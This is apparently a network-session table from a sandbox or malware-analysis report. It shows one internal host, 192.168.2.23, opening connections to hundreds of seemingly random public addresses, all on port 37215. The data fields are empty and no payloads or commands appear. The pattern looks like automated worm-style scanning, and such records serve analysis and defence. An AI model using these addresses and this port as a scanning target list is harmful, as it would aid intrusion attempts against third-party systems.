                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13951192.168.2.2340948177.171.137.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13952192.168.2.2349200157.95.141.22337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13953192.168.2.2346300157.195.96.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13954192.168.2.2336138157.1.142.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13955192.168.2.2352196157.172.243.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13956192.168.2.2359872157.207.207.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13957192.168.2.234369041.209.44.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13958192.168.2.234098841.55.60.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13959192.168.2.2342760197.48.37.12637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13960192.168.2.2339326157.26.211.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13961192.168.2.2358404197.76.185.16637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13962192.168.2.235768841.198.169.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13963192.168.2.2336048157.69.17.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13964192.168.2.2336428157.47.176.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13965192.168.2.2354734197.230.19.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13966192.168.2.235029641.235.246.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13967192.168.2.2347028157.54.253.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13968192.168.2.234956273.244.111.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13969192.168.2.2342672197.136.126.7937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13970192.168.2.2352664157.156.170.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13971192.168.2.234173492.143.3.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13972192.168.2.235977464.199.6.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13973192.168.2.235057841.131.91.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13974192.168.2.234072441.194.232.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13975192.168.2.233634258.219.187.17737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13976192.168.2.2358152157.208.14.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13977192.168.2.2355924197.236.48.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13978192.168.2.2356166197.84.73.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13979192.168.2.2338334197.127.200.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13980192.168.2.2340650209.63.197.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13981192.168.2.2333726197.249.178.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13982192.168.2.2356280157.50.19.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13983192.168.2.2341470197.18.52.14737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13984192.168.2.235982641.169.14.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13985192.168.2.2352068157.80.186.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13986192.168.2.2355232157.186.124.4537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13987192.168.2.2360112176.89.128.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13988192.168.2.2352004197.1.89.3137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13989192.168.2.233764241.109.23.6837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13990192.168.2.2347046157.114.3.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13991192.168.2.2348148157.120.78.24137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13992192.168.2.234326441.94.238.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13993192.168.2.233634641.42.105.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13994192.168.2.235238889.97.106.12637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13995192.168.2.2352662157.21.83.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13996192.168.2.2347358157.205.40.6537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13997192.168.2.2339154197.138.27.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13998192.168.2.234363840.140.255.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13999192.168.2.2347334148.15.90.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14000192.168.2.23556788.245.165.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14001192.168.2.2348588197.149.25.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14002192.168.2.2357338157.191.247.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14003192.168.2.2357900197.246.182.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14004192.168.2.2340432197.228.133.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14005192.168.2.234281641.87.98.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14006192.168.2.2352374157.98.98.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14007192.168.2.2347522157.164.3.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14008192.168.2.2333672197.23.63.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14009192.168.2.2350342157.126.21.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14010192.168.2.2347388138.197.141.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14011192.168.2.2336892157.245.250.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14012192.168.2.234940441.56.105.17337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14013192.168.2.2358342197.227.81.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14014192.168.2.233483870.127.31.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14015192.168.2.234167041.186.69.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14016192.168.2.234751274.229.249.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14017192.168.2.2356360197.79.34.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14018192.168.2.2338882197.79.108.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14019192.168.2.234084441.84.77.3137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14020192.168.2.2349382173.210.66.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14021192.168.2.235646841.15.158.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14022192.168.2.2342028179.137.227.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14023192.168.2.234608041.143.161.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14024192.168.2.2345042197.77.76.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14025192.168.2.2352290162.240.43.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14026192.168.2.2352816197.138.168.2737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14027192.168.2.2358854197.254.98.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14028192.168.2.2337662157.18.18.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14029192.168.2.235917241.70.1.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14030192.168.2.2335744128.69.244.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14031192.168.2.2334204197.116.90.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14032192.168.2.2340734189.245.37.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14033192.168.2.2343598134.81.10.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14034192.168.2.234607441.206.245.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14035192.168.2.233869241.13.174.15837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14036192.168.2.234681841.84.139.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14037192.168.2.2355042157.228.134.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14038192.168.2.2354048157.44.150.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14039192.168.2.2344892206.45.149.13537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14040192.168.2.2346506157.201.180.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14041192.168.2.2359024197.201.49.16337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14042192.168.2.2343882197.182.220.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14043192.168.2.2336166197.58.233.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14044192.168.2.2342624197.157.205.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14045192.168.2.2348904157.211.3.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14046192.168.2.2336462102.172.33.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14047192.168.2.2340344181.199.61.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14048192.168.2.233654441.138.36.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14049192.168.2.2360592157.75.254.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14050192.168.2.2336798197.88.34.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14051192.168.2.2338100157.190.73.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14052192.168.2.2355406157.253.251.9237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14053192.168.2.2335518157.173.0.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14054192.168.2.235395298.58.191.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14055192.168.2.2359358157.137.253.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14056192.168.2.2341670157.12.25.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14057192.168.2.2333474197.32.212.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14058192.168.2.2342990157.12.104.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14059192.168.2.234071241.231.205.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14060192.168.2.234795641.240.15.13537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14061192.168.2.2341494157.39.230.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14062192.168.2.234702441.59.88.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14063192.168.2.2353350197.123.80.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14064192.168.2.2339570157.173.232.22337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14065192.168.2.2333414157.239.162.22437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14066192.168.2.2338840197.50.80.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14067192.168.2.2338784108.193.73.1337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14068192.168.2.234212075.87.19.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14069192.168.2.235927264.92.188.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14070192.168.2.2344812197.179.37.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14071192.168.2.234110014.232.64.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14072192.168.2.2357604197.188.97.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14073192.168.2.2344428197.53.36.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14074192.168.2.2360542197.199.3.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14075192.168.2.2356374109.121.212.22337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14076192.168.2.2336966197.132.39.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14077192.168.2.235705441.122.200.137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14078192.168.2.2351742108.128.160.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14079192.168.2.235679841.198.133.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14080192.168.2.233517641.169.204.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14081192.168.2.2355746157.157.148.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14082192.168.2.234471241.155.86.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14083192.168.2.234828441.136.190.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14084192.168.2.235713241.81.250.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14085192.168.2.2347984157.16.115.12337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14086192.168.2.235696041.4.240.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14087192.168.2.2344486125.216.25.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14088192.168.2.234459041.252.182.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14089192.168.2.235234485.62.8.4937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14090192.168.2.2359080157.165.204.14737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14091192.168.2.234007241.213.111.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14092192.168.2.2351460157.26.194.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14093192.168.2.2338692197.61.29.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14094192.168.2.2345478128.188.96.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14095192.168.2.2335764157.75.71.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14096192.168.2.23374862.93.158.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14097192.168.2.2353272137.220.50.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14098192.168.2.2345486157.127.60.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14099192.168.2.233905637.225.189.6237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14100192.168.2.2346846157.175.51.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14101192.168.2.2339816197.79.38.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14102192.168.2.2333184211.50.79.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14103192.168.2.2341550197.139.183.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14104192.168.2.2353122197.204.188.6137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14105192.168.2.2359162197.176.71.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14106192.168.2.234188275.134.191.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14107192.168.2.233789641.201.55.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14108192.168.2.2334240197.195.171.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14109192.168.2.2354992197.67.208.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14110192.168.2.2336788197.43.42.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14111192.168.2.234669841.212.98.4937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14112192.168.2.234856241.214.208.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14113192.168.2.234886441.246.172.8437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14114192.168.2.2339136163.236.236.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14115192.168.2.2358554157.39.255.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14116192.168.2.2343466157.26.132.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14117192.168.2.2355452136.198.45.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14118192.168.2.234426041.245.224.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14119192.168.2.235317687.253.203.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14120192.168.2.2337934208.132.150.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14121192.168.2.2355312197.97.116.16637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14122192.168.2.2352936157.12.112.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14123192.168.2.234234473.75.228.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14124192.168.2.233407041.123.127.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14125192.168.2.2345520197.0.30.2437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14126192.168.2.2335498157.95.184.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14127192.168.2.233754289.113.203.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14128192.168.2.2339278197.27.199.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14129192.168.2.2352860136.85.191.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14130192.168.2.2348372157.156.17.4537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14131192.168.2.2350680197.171.191.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14132192.168.2.2347296157.174.18.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14133192.168.2.2351466197.171.227.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14134192.168.2.2334728157.26.101.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14135192.168.2.2359190197.250.2.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14136192.168.2.235765441.222.223.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14137192.168.2.233352437.234.231.2737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14138192.168.2.2351190197.105.200.1837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14139192.168.2.2343488197.224.30.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14140192.168.2.235909841.165.85.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14141192.168.2.2359942197.212.190.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14142192.168.2.23587565.155.12.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14143192.168.2.233350841.49.132.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14144192.168.2.2353280197.66.95.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14145192.168.2.233597441.151.23.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14146192.168.2.235146641.58.227.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14147192.168.2.2350676157.12.82.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14148192.168.2.2344902157.86.192.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14149192.168.2.2333934157.82.32.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14150192.168.2.233595641.162.216.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14151192.168.2.235250441.39.102.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14152192.168.2.2350100157.176.213.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14153192.168.2.233372875.214.173.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14154192.168.2.2359850157.213.163.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14155192.168.2.2340658118.219.58.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14156192.168.2.2353318157.246.185.1337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14157192.168.2.2334758197.139.10.937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14158192.168.2.233979075.70.188.12637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14159192.168.2.2334814197.21.170.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14160192.168.2.233871241.14.89.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14161192.168.2.234268441.182.42.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14162192.168.2.2359930157.237.146.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14163192.168.2.2355104157.141.176.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14164192.168.2.2359796197.218.86.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14165192.168.2.235651241.83.204.7937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14166192.168.2.2338802157.8.188.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14167192.168.2.233471053.236.95.137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14168192.168.2.235110641.100.1.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
